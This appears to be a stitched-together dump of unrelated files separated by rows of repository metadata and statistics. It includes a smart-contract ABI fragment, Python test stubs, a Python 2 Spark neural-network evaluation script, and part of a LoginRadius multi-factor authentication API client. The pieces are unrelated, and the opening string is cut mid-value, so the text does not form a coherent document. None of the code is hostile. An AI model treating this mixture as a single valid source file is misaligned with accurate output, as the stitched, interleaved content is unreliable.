IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"unpauseSale","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]'
luchanames_contract_addr = "0x741f506e38ceA4e001f770eB14F6eC9B468D9899"
luchanames_abi = '[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"_originContract","type":"address"},{"indexed":true,"internalType":"address","name":"_sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"id","type":"uint256"},{"indexed":false,"internalType":"string","name":"name","type":"string"}],"name":"SetName","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"addressBlacklist","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_bool","type":"bool"}],"name":"blacklistAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"}],"name":"blacklistName","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"}],"name":"getName","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"_name","type":"string"}],"name":"isSafeName","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"string","name":"","type":"string"}],"name":"nameExists","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"nameFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint256","name":"","type":"uint256"}],"name":"names","outputs":[{"internalType":"string","name":"name","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"},{"internalType":"string","name":"_name","type":"string"}],"name":"set1Name","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"},{"internalType":"string","name":"_name1","type":"string"},{"internalType":"string","name":"_name2","type":"string"}],"name":"set2Names","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"},{"internalType":"string","name":"_name1","type":"string"},{"internalType":"string","name":"_name2","type":"string"},{"internalType":"string","name":"_name3","type":"string"}],"name":"set3Names","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"},{"internalType":"string","name":"_name1","type":"string"},{"internalType":"string","name":"_name2","type":"string"},{"internalType":"string","name":"_name3","type":"string"},{"internalType":"string","name":"_name4","type":"string"}],"name":"set4Names","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"},{"internalType":"string","name":"_name1","type":"string"},{"internalType":"string","name":"_name2","type":"string"},{"internalType":"string","name":"_name3","type":"string"},{"internalType":"string","name":"_name4","type":"string"},{"internalType":"string","name":"_name5","type":"string"}],"name":"set5Names","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_nameFee","type":"uint256"}],"name":"setNameFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"unpause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]'
| 712.105263
| 7,493
| 0.666519
| 1,289
| 13,530
| 6.957331
| 0.096974
| 0.071142
| 0.100357
| 0.107047
| 0.862623
| 0.84322
| 0.828167
| 0.762823
| 0.758363
| 0.708073
| 0
| 0.022618
| 0.003326
| 13,530
| 18
| 7,494
| 751.666667
| 0.642418
| 0.0068
| 0
| 0
| 1
| 0.285714
| 0.987786
| 0.987711
| 0
| 0
| 0.006256
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
c3e34fcfa228999b37adeec89ee7ef43350a50a3
| 61
|
py
|
Python
|
problem_18/__init__.py
|
oltionzefi/daily-coding-problem
|
4fe3ec53e1f3c7d299849671fdfead462d548cd3
|
[
"MIT"
] | null | null | null |
problem_18/__init__.py
|
oltionzefi/daily-coding-problem
|
4fe3ec53e1f3c7d299849671fdfead462d548cd3
|
[
"MIT"
] | null | null | null |
problem_18/__init__.py
|
oltionzefi/daily-coding-problem
|
4fe3ec53e1f3c7d299849671fdfead462d548cd3
|
[
"MIT"
] | null | null | null |
from .problem_18 import max_sub_arrays, max_sub_arrays_deque
| 30.5
| 60
| 0.885246
| 11
| 61
| 4.363636
| 0.727273
| 0.25
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0.081967
| 61
| 1
| 61
| 61
| 0.821429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
61877ccfd874f866d733ef6ccc36256f467864f9
| 112
|
py
|
Python
|
src/accounts/forms/__init__.py
|
Talengi/phase
|
60ff6f37778971ae356c5b2b20e0d174a8288bfe
|
[
"MIT"
] | 8
|
2016-01-29T11:53:40.000Z
|
2020-03-02T22:42:02.000Z
|
src/accounts/forms/__init__.py
|
Talengi/phase
|
60ff6f37778971ae356c5b2b20e0d174a8288bfe
|
[
"MIT"
] | 289
|
2015-03-23T07:42:52.000Z
|
2022-03-11T23:26:10.000Z
|
src/accounts/forms/__init__.py
|
Talengi/phase
|
60ff6f37778971ae356c5b2b20e0d174a8288bfe
|
[
"MIT"
] | 7
|
2015-12-08T09:03:20.000Z
|
2020-05-11T15:36:51.000Z
|
# -*- coding: utf-8 -*-
from accounts.forms.fields import * # noqa
from accounts.forms.base import * # noqa
| 18.666667
| 43
| 0.660714
| 15
| 112
| 4.933333
| 0.666667
| 0.324324
| 0.459459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010989
| 0.1875
| 112
| 5
| 44
| 22.4
| 0.802198
| 0.276786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4ef5b9e80c846bf8c9ffd7c4bf44ccc8cb8c2f52
| 8,861
|
py
|
Python
|
analysis/analysis.py
|
tonandr/spark_deep
|
f9fcb3d7fe9f23624b545b4d5e7506ba6d95f010
|
[
"Apache-2.0"
] | null | null | null |
analysis/analysis.py
|
tonandr/spark_deep
|
f9fcb3d7fe9f23624b545b4d5e7506ba6d95f010
|
[
"Apache-2.0"
] | 1
|
2020-10-14T04:36:12.000Z
|
2020-10-14T04:36:12.000Z
|
analysis/analysis.py
|
tonandr/spark_fnn
|
f9fcb3d7fe9f23624b545b4d5e7506ba6d95f010
|
[
"Apache-2.0"
] | null | null | null |
'''
Analysis of learning models' evaluation
@author: Inwoo Chung (gutomitai@gmail.com)
@since: Sep. 17, 2016
'''
'''
Analysis about SparkNeuralNetwork.
'''
import math
# Calculate judging accuracy for classification.
def calJudgingAccuracyC(yResults, jResult):
# Count matched numbers.
length = yResults.colLength()
count = 0.0
for i in range(length):
print i, yResults.getVal(1, i + 1), jResult.getVal(1, i + 1)
if (yResults.getVal(1, i + 1) == jResult.getVal(1, i + 1)):
count = count + 1.0
accuracy = count / float(length)
print str(accuracy * 100.0) + " %"
return accuracy
# Calculate judging accuracy for regression.
def calJudgingAccuracyR(yResults, jResult):
# Count matched numbers.
length = yResults.colLength()
diffSum = 0.0
for i in range(length):
print i, yResults.getVal(1, i + 1), jResult.getVal(1, i + 1)
diffSum = diffSum + math.fabs(yResults.getVal(1, i + 1) - jResult.getVal(1, i + 1))
accuracy = diffSum / float(length)
print str(accuracy)
return accuracy
# Parse handwritten numbers data into matrixes.
def parseHandwrittenNumData(gateway, dataFilePath, loadFlag = False):
if (loadFlag):
X = gateway.jvm.maum.dm.Matrix.loadMatrix("HWN_X.ser")
Y = gateway.jvm.maum.dm.Matrix.loadMatrix("HWN_Y.ser")
yResults = gateway.jvm.maum.dm.Matrix.loadMatrix("HWN_yResults.ser")
return X, Y, yResults
with open(dataFilePath, 'rb') as file:
csvReader = csv.reader(file)
# Create X, Y java matrix instances.
X = gateway.jvm.maum.dm.Matrix(400, 5000, 0.0)
Y = gateway.jvm.maum.dm.Matrix(10, 5000, 0.0)
yResults = gateway.jvm.maum.dm.Matrix(1, 5000, 0.0)
# Assign values at X, Y.
cols = 1
for line in csvReader:
print str(cols) + ", " + str(int(line[400]))
for i in range(len(line) - 1):
X.setVal(i + 1, cols, float(line[i]))
if (int(line[400]) == 10):
Y.setVal(1, cols, 1.0)
yResults.setVal(1, cols, 0.0)
else:
Y.setVal(int(line[400]) + 1, cols, 1.0)
yResults.setVal(1, cols, float(line[400]))
cols = cols + 1
# Save.
X.saveMatrix("HWN_X.ser")
Y.saveMatrix("HWN_Y.ser")
yResults.saveMatrix("HWN_yResults.ser")
return X, Y, yResults
# Parse handwritten numbers data into matrixes for regression.
def parseHandwrittenNumDataReg(gateway, dataFilePath, loadFlag = False):
if (loadFlag):
X = gateway.jvm.maum.dm.Matrix.loadMatrix("HWN_X_reg.ser")
Y = gateway.jvm.maum.dm.Matrix.loadMatrix("HWN_Y_reg.ser")
yResults = gateway.jvm.maum.dm.Matrix.loadMatrix("HWN_yResults_reg.ser")
return X, Y, yResults
with open(dataFilePath, 'rb') as file:
csvReader = csv.reader(file)
# Create X, Y java matrix instances.
X = gateway.jvm.maum.dm.Matrix(400, 5000, 0.0)
Y = gateway.jvm.maum.dm.Matrix(1, 5000, 0.0)
yResults = gateway.jvm.maum.dm.Matrix(1, 5000, 0.0)
# Assign values at X, Y.
cols = 1
for line in csvReader:
print str(cols) + ", " + str(int(line[400]))
for i in range(len(line) - 1):
X.setVal(i + 1, cols, float(line[i]))
if (int(line[400]) == 10):
Y.setVal(1, cols, 0.0)
yResults.setVal(1, cols, 0.0)
else:
Y.setVal(1, cols, float(line[400]))
yResults.setVal(1, cols, float(line[400]))
cols = cols + 1
# Save.
X.saveMatrix("HWN_X_reg.ser")
Y.saveMatrix("HWN_Y_reg.ser")
yResults.saveMatrix("HWN_yResults_reg.ser")
return X, Y, yResults
# Convert a Py4jArray.
def convPy4jArray(raw_vs):
vs = list()
for raw_v in raw_vs:
vs.append(raw_v)
return vs
import csv
from py4j.java_gateway import *
# For classification
gateway = JavaGateway(auto_field=True, auto_convert=True)
java_import(gateway.jvm, "org.apache.spark.SparkConf")
conf = gateway.jvm.SparkConf().setMaster("local[*]").setAppName("SparkNN")
sc = gateway.entry_point.getSparkContext(conf)
X, Y, yResults = parseHandwrittenNumData(gateway, "ex4data1.csv", loadFlag=True)
numLayers = 3; numActs = gateway.new_array(gateway.jvm.int, numLayers)
numActs[0] = 400; numActs[1] = 25; numActs[2] = 10
nonlinearCGOptimizer = gateway.entry_point.getNonlinearCGOptimizer();
clusterComputingMode = 0;
acceleratingComputingMode = 0;
hwn_nn = gateway.entry_point.getNeuralNetworkClassification(clusterComputingMode, acceleratingComputingMode, numLayers, numActs, nonlinearCGOptimizer)
la = 0.0; batchMode = 0; numSamplesForMiniBatch = 1; numRepeat = 1; numIter = 20; isGradientChecking = False
JEstimationFlag = False; JEstimationRatio = 1.0
tResult = hwn_nn.train(sc, X, Y, la, batchMode, numSamplesForMiniBatch, numRepeat, numIter, isGradientChecking, JEstimationFlag, JEstimationRatio)
costVals = convPy4jArray(tResult.costVals)
jResults = hwn_nn.judge(X, 0.0)
accuracy = calJudgingAccuracyC(yResults, jResults)
# For regression.
gateway = JavaGateway(auto_field=True, auto_convert=True)
java_import(gateway.jvm, "org.apache.spark.SparkConf")
conf = gateway.jvm.SparkConf().setMaster("local[*]").setAppName("SparkNN")
sc = gateway.entry_point.getSparkContext(conf)
X, Y, yResults = parseHandwrittenNumDataReg(gateway, "ex4data1.csv", loadFlag=True)
numLayers = 3; numActs = gateway.new_array(gateway.jvm.int, numLayers)
numActs[0] = 400; numActs[1] = 25; numActs[2] = 1
nonlinearCGOptimizer = gateway.entry_point.getNonlinearCGOptimizer();
clusterComputingMode = 0;
acceleratingComputingMode = 0;
hwn_nn = gateway.entry_point.getNeuralNetworkRegression(clusterComputingMode, acceleratingComputingMode, numLayers, numActs, nonlinearCGOptimizer)
la = 0.0; batchMode = 0; numSamplesForMiniBatch = 1; numRepeat = 1; numIter = 100; isGradientChecking = False
JEstimationFlag = False; JEstimationRatio = 1.0
tResult = hwn_nn.train(sc, X, Y, la, batchMode, numSamplesForMiniBatch, numRepeat, numIter, isGradientChecking, JEstimationFlag, JEstimationRatio)
costVals = convPy4jArray(tResult.costVals)
jResults = hwn_nn.predict(X)
accuracy = calJudgingAccuracyR(yResults, jResults)
# For classification
gateway = JavaGateway(auto_field=True, auto_convert=True)
java_import(gateway.jvm, "org.apache.spark.SparkConf")
conf = gateway.jvm.SparkConf().setMaster("local[*]").setAppName("SparkNN")
sc = gateway.entry_point.getSparkContext(conf)
X, Y, yResults = parseHandwrittenNumData(gateway, "ex4data1.csv", loadFlag=True)
numLayers = 3; numActs = gateway.new_array(gateway.jvm.int, numLayers)
numActs[0] = 400; numActs[1] = 25; numActs[2] = 10
LBFGSOptimizer = gateway.entry_point.getLBFGSOptimizer();
clusterComputingMode = 1;
acceleratingComputingMode = 0;
hwn_nn = gateway.entry_point.getNeuralNetworkClassification(clusterComputingMode, acceleratingComputingMode, numLayers, numActs, LBFGSOptimizer)
la = 0.0; batchMode = 0; numSamplesForMiniBatch = 1; numRepeat = 1; numIter = 2; isGradientChecking = False
JEstimationFlag = False; JEstimationRatio = 1.0
tResult = hwn_nn.train(sc, X, Y, la, batchMode, numSamplesForMiniBatch, numRepeat, numIter, isGradientChecking, JEstimationFlag, JEstimationRatio)
costVals = convPy4jArray(tResult.costVals)
jResults = hwn_nn.judge(X, 0.0)
accuracy = calJudgingAccuracyC(yResults, jResults)
# For regression.
gateway = JavaGateway(auto_field=True, auto_convert=True)
java_import(gateway.jvm, "org.apache.spark.SparkConf")
conf = gateway.jvm.SparkConf().setMaster("local[*]").setAppName("SparkNN")
sc = gateway.entry_point.getSparkContext(conf)
X, Y, yResults = parseHandwrittenNumDataReg(gateway, "ex4data1.csv", loadFlag=True)
numLayers = 3; numActs = gateway.new_array(gateway.jvm.int, numLayers)
numActs[0] = 400; numActs[1] = 25; numActs[2] = 1
LBFGSOptimizer = gateway.entry_point.getLBFGSOptimizer();
clusterComputingMode = 0;
acceleratingComputingMode = 0;
hwn_nn = gateway.entry_point.getNeuralNetworkRegression(clusterComputingMode, acceleratingComputingMode, numLayers, numActs, LBFGSOptimizer)
la = 0.0; batchMode = 0; numSamplesForMiniBatch = 1; numRepeat = 1; numIter = 50; isGradientChecking = False
JEstimationFlag = False; JEstimationRatio = 1.0
tResult = hwn_nn.train(sc, X, Y, la, batchMode, numSamplesForMiniBatch, numRepeat, numIter, isGradientChecking, JEstimationFlag, JEstimationRatio)
costVals = convPy4jArray(tResult.costVals)
jResults = hwn_nn.predict(X)
accuracy = calJudgingAccuracyR(yResults, jResults)
| 40.646789
| 150
| 0.681639
| 1,049
| 8,861
| 5.697807
| 0.148713
| 0.040154
| 0.028108
| 0.032123
| 0.907479
| 0.883219
| 0.847917
| 0.842898
| 0.816463
| 0.816296
| 0
| 0.033549
| 0.199413
| 8,861
| 217
| 151
| 40.834101
| 0.808994
| 0.052026
| 0
| 0.677852
| 0
| 0
| 0.046523
| 0.012666
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.04698
| null | null | 0.040268
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f61a116e126d13c809fc02f184e5dbf9c64c8a1c
| 131
|
py
|
Python
|
tests/ensembl_gene_test.py
|
ACastanza/ensembl-genes
|
64f053f464e2a1a60deaaaa7da6043bfab14c826
|
[
"Apache-2.0"
] | null | null | null |
tests/ensembl_gene_test.py
|
ACastanza/ensembl-genes
|
64f053f464e2a1a60deaaaa7da6043bfab14c826
|
[
"Apache-2.0"
] | null | null | null |
tests/ensembl_gene_test.py
|
ACastanza/ensembl-genes
|
64f053f464e2a1a60deaaaa7da6043bfab14c826
|
[
"Apache-2.0"
] | null | null | null |
from ensembl_genes.ensembl_genes import Ensembl_Gene_Queries
def test_ensembl_gene_queries() -> None:
Ensembl_Gene_Queries()
| 21.833333
| 60
| 0.824427
| 18
| 131
| 5.5
| 0.5
| 0.333333
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114504
| 131
| 5
| 61
| 26.2
| 0.853448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f630077fc91a13993ff5b4cc8a7b6b217cb6a663
| 29,867
|
py
|
Python
|
python-idx-demo/Demo/LoginRadius/api/advanced/multifactorauthentication_api.py
|
akshay-s-770/login-page-demos
|
d2006f3af0d893488586d0da5ad54d84f99e2f92
|
[
"MIT"
] | 1
|
2020-08-01T22:11:13.000Z
|
2020-08-01T22:11:13.000Z
|
python-idx-demo/Demo/LoginRadius/api/advanced/multifactorauthentication_api.py
|
akshay-s-770/login-page-demos
|
d2006f3af0d893488586d0da5ad54d84f99e2f92
|
[
"MIT"
] | 4
|
2021-09-28T05:58:17.000Z
|
2022-03-31T01:51:36.000Z
|
python-idx-demo/Demo/LoginRadius/api/advanced/multifactorauthentication_api.py
|
shvam0000/login-page-demos
|
0cbf3df58243326f77e57b2d7dbca868f830107b
|
[
"MIT"
] | 13
|
2020-06-23T20:45:32.000Z
|
2022-02-14T14:26:01.000Z
|
# -- coding: utf-8 --
# Created by LoginRadius Development Team
# Copyright 2019 LoginRadius Inc. All rights reserved.
#
class MultiFactorAuthenticationApi:
def __init__(self, lr_object):
"""
:param lr_object: this is the reference to the parent LoginRadius object.
"""
self._lr_object = lr_object
def mfa_configure_by_access_token(self, access_token, sms_template2_f_a=None):
"""This API is used to configure the Multi-factor authentication after login by using the access_token when MFA is set as optional on the LoginRadius site.
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
sms_template2_f_a: SMS Template Name
Returns:
Response containing Definition of Complete Multi-Factor Authentication Settings data
5.7
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
resource_path = "identity/v2/auth/account/2fa"
return self._lr_object.execute("GET", resource_path, query_parameters, None)
def mfa_update_setting(self, access_token, multi_factor_auth_model_with_lockout, fields=''):
"""This API is used to trigger the Multi-factor authentication settings after login for secure actions
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
multi_factor_auth_model_with_lockout: Model Class containing Definition of payload for MultiFactorAuthModel With Lockout API
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
Returns:
Response containing Definition for Complete profile data
5.9
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
if(multi_factor_auth_model_with_lockout is None):
raise Exception(self._lr_object.get_validation_message("multi_factor_auth_model_with_lockout"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
resource_path = "identity/v2/auth/account/2fa/verification/otp"
return self._lr_object.execute("PUT", resource_path, query_parameters, multi_factor_auth_model_with_lockout)
def mfa_update_by_access_token(self, access_token, multi_factor_auth_model_by_google_authenticator_code, fields='',
sms_template=None):
"""This API is used to Enable Multi-factor authentication by access token on user login
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
multi_factor_auth_model_by_google_authenticator_code: Model Class containing Definition of payload for MultiFactorAuthModel By GoogleAuthenticator Code API
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
sms_template: SMS Template name
Returns:
Response containing Definition for Complete profile data
5.10
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
if(multi_factor_auth_model_by_google_authenticator_code is None):
raise Exception(self._lr_object.get_validation_message("multi_factor_auth_model_by_google_authenticator_code"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
if(not self._lr_object.is_null_or_whitespace(sms_template)):
query_parameters["smsTemplate"] = sms_template
resource_path = "identity/v2/auth/account/2fa/verification/googleauthenticatorcode"
return self._lr_object.execute("PUT", resource_path, query_parameters, multi_factor_auth_model_by_google_authenticator_code)
def mfa_update_phone_number_by_token(self, access_token, phone_no2_f_a, sms_template2_f_a=None):
"""This API is used to update the Multi-factor authentication phone number by sending the verification OTP to the provided phone number
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
phone_no2_f_a: Phone Number For 2FA
sms_template2_f_a: SMS Template Name
Returns:
Response containing Definition for Complete SMS data
5.11
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
if(self._lr_object.is_null_or_whitespace(phone_no2_f_a)):
raise Exception(self._lr_object.get_validation_message("phone_no2_f_a"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
body_parameters = {}
body_parameters["phoneNo2FA"] = phone_no2_f_a
resource_path = "identity/v2/auth/account/2fa"
return self._lr_object.execute("PUT", resource_path, query_parameters, body_parameters)
def mfa_reset_google_auth_by_token(self, access_token, googleauthenticator):
"""This API Resets the Google Authenticator configurations on a given account via the access_token
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
googleauthenticator: boolean type value,Enable google Authenticator Code.
Returns:
Response containing Definition of Delete Request
5.12.1
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
body_parameters = {}
body_parameters["googleauthenticator"] = googleauthenticator
resource_path = "identity/v2/auth/account/2fa/authenticator"
return self._lr_object.execute("DELETE", resource_path, query_parameters, body_parameters)
def mfa_reset_sms_auth_by_token(self, access_token, otpauthenticator):
"""This API resets the SMS Authenticator configurations on a given account via the access_token.
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
otpauthenticator: Pass 'otpauthenticator' to remove SMS Authenticator
Returns:
Response containing Definition of Delete Request
5.12.2
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
body_parameters = {}
body_parameters["otpauthenticator"] = otpauthenticator
resource_path = "identity/v2/auth/account/2fa/authenticator"
return self._lr_object.execute("DELETE", resource_path, query_parameters, body_parameters)
def mfa_backup_code_by_access_token(self, access_token):
"""This API is used to get a set of backup codes via access_token to allow the user login on a site that has Multi-factor Authentication enabled in the event that the user does not have a secondary factor available. We generate 10 codes, each code can only be consumed once. If any user attempts to go over the number of invalid login attempts configured in the Dashboard then the account gets blocked automatically
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
Returns:
Response containing Definition of Complete Backup Code data
5.13
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
resource_path = "identity/v2/auth/account/2fa/backupcode"
return self._lr_object.execute("GET", resource_path, query_parameters, None)
def mfa_reset_backup_code_by_access_token(self, access_token):
"""API is used to reset the backup codes on a given account via the access_token. This API call will generate 10 new codes, each code can only be consumed once
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
Returns:
Response containing Definition of Complete Backup Code data
5.14
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
resource_path = "identity/v2/auth/account/2fa/backupcode/reset"
return self._lr_object.execute("GET", resource_path, query_parameters, None)
def mfa_login_by_email(self, email, password, email_template=None,
fields='', login_url=None, sms_template=None, sms_template2_f_a=None,
verification_url=None):
"""This API can be used to login by emailid on a Multi-factor authentication enabled LoginRadius site.
Args:
email: user's email
password: Password for the email
email_template: Email template name
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
login_url: Url where the user is logging from
sms_template: SMS Template name
sms_template2_f_a: SMS Template Name
verification_url: Email verification url
Returns:
Complete user UserProfile data
9.8.1
"""
if(self._lr_object.is_null_or_whitespace(email)):
raise Exception(self._lr_object.get_validation_message("email"))
if(self._lr_object.is_null_or_whitespace(password)):
raise Exception(self._lr_object.get_validation_message("password"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(email_template)):
query_parameters["emailTemplate"] = email_template
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
if(not self._lr_object.is_null_or_whitespace(login_url)):
query_parameters["loginUrl"] = login_url
if(not self._lr_object.is_null_or_whitespace(sms_template)):
query_parameters["smsTemplate"] = sms_template
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
if(not self._lr_object.is_null_or_whitespace(verification_url)):
query_parameters["verificationUrl"] = verification_url
body_parameters = {}
body_parameters["email"] = email
body_parameters["password"] = password
resource_path = "identity/v2/auth/login/2fa"
return self._lr_object.execute("POST", resource_path, query_parameters, body_parameters)
def mfa_login_by_user_name(self, password, username, email_template=None,
fields='', login_url=None, sms_template=None, sms_template2_f_a=None,
verification_url=None):
"""This API can be used to login by username on a Multi-factor authentication enabled LoginRadius site.
Args:
password: Password for the email
username: Username of the user
email_template: Email template name
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
login_url: Url where the user is logging from
sms_template: SMS Template name
sms_template2_f_a: SMS Template Name
verification_url: Email verification url
Returns:
Complete user UserProfile data
9.8.2
"""
